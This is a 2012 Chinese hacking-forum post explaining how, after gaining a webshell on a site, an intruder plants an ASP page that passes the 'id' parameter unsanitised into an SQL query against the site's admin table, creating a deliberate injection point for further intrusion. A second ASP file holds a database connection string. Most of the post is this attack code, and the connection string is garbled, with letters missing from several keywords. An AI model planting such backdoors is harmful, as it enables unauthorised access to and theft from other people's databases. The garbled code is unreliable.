找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1991|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
自己构造注入点方便入侵0 z: y$ H; V  n# P2 c
! i* J4 Y; D+ P+ {+ Z: [
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息: S; C7 Y; j4 a' N. S: O9 g
0 j4 \# \1 x6 t9 ]. N
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
$ ~7 m3 e6 Z+ t
, Z1 T; D) r9 L首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
6 \* B% T1 o! t8 Q  b2 u* R/ _
5 Q. K. w# O) _" I) k/ A密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
. U9 t& v4 Q+ G# ?- o7 h: N- _) j6 n% C# F. ?% I; E5 D
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
( Y+ P, t  K' }0 c1 e
7 b  K( g" \2 d$ H  D/ C, z: I程序代码& U1 e" f5 O1 b! x, X  }" l7 p
<!--#include file="xx.asp"-->" b( |# s6 [" R
<%" m2 r# h7 a, l+ y8 i. L$ t, w5 E* f
set rs=server.createobject("ADODB.recordset")
8 y/ s! {; S! a" g6 Bid = request("id")
4 f  g, ~9 ~0 i  `4 N. HstrSQL = "select * from admin where id=" & id
; b0 h. W% W* i; {$ o5 V# `rs.open strSQL,conn,1,3
1 c; Z9 I6 T0 T8 N1 Q+ F: i, c6 Xrs.close+ [* _  s: i% s6 w3 j4 c8 G4 N: V8 E
%>. q: r5 F: k) `2 D8 e
3 I7 |7 O, F* L5 O; i0 d
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
. f3 @; E4 A4 e0 h4 B
0 N+ l6 V, [/ A8 G5 X1 Z- |你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!/ Z7 o; \3 i- d9 j' a$ ]

  Q8 K, ?2 G2 e7 z5 E然后就要构造一个连接数据库的文件了,代码如下:
. `/ f0 V$ ?5 m程序代码' Z- o9 k1 \7 n  v% p) y9 I* K* {: N
<%        5 Q0 S( x+ d8 M& }/ Y
strSQLServerName = "000.000.000.000"     '服务器名称或地址
; q8 c; |( B6 M! E+ O- b2 d# D; A* r4 gstrSQLDBUserName = "sqlname"         '数据库帐号% g! F4 ^! }/ m8 O' X9 T, C
strSQLDBPassword = "sqlpass"         '数据库密码
/ j/ [! N3 X. Q" b; z. k# v: l+ ustrSQLDBName = "sqldataname"           '数据库名称
* W  Y% T( y9 Y. n1 T2 J6 S) jSet conn = Server.CreateObject("ADODB.Connection")/ ?2 |7 c8 V0 n( i7 e
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"1 r6 {5 S. ]& b
conn.open strCon( \% ~' b# p% v/ ], K( U9 {
%>0 v, i3 F; B7 \9 Z4 n# L9 v

+ I; n/ f1 {, V1 y0 F. h这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,+ _0 X7 z' ?' v* q# g
; X! u* j: [. T# o  h
就这样,正常情况下,就OK了,伪造成功……
9 @. e+ m' _3 f! L8 V2 |1 ]4 V" z1 V
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表